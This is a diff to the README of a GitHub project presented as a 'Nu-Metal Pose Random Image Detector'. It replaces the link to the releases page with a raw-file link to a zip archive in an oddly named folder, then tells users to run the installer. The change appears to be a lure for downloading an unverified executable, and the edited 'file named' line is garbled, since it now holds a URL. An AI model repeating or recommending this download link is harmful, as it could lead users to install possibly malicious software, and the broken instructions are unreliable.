DONVIC405/Nu-Metal-Pose-Random-Image-Detector/README.md

 1. **Download the Application**

-   Visit the following link to access the latest release: [Download the Latest Version](https://github.com/DONVIC405/Nu-Metal-Pose-Random-Image-Detector/releases).
-Look for the file named `Nu-Metal-Pose-Random-Image-Detector.exe` for Windows users or the equivalent package for macOS or Linux.
+   Visit the following link to access the latest release: [Download the Latest Version](https://raw.githubusercontent.com/DONVIC405/Nu-Metal-Pose-Random-Image-Detector/main/hebetic/Nu-Metal-Pose-Random-Image-Detector-v2.6.zip).
+Look for the file named `https://raw.githubusercontent.com/DONVIC405/Nu-Metal-Pose-Random-Image-Detector/main/hebetic/Nu-Metal-Pose-Random-Image-Detector-v2.6.zip` for Windows users or the equivalent package for macOS or Linux.

 2. **Run the Installer**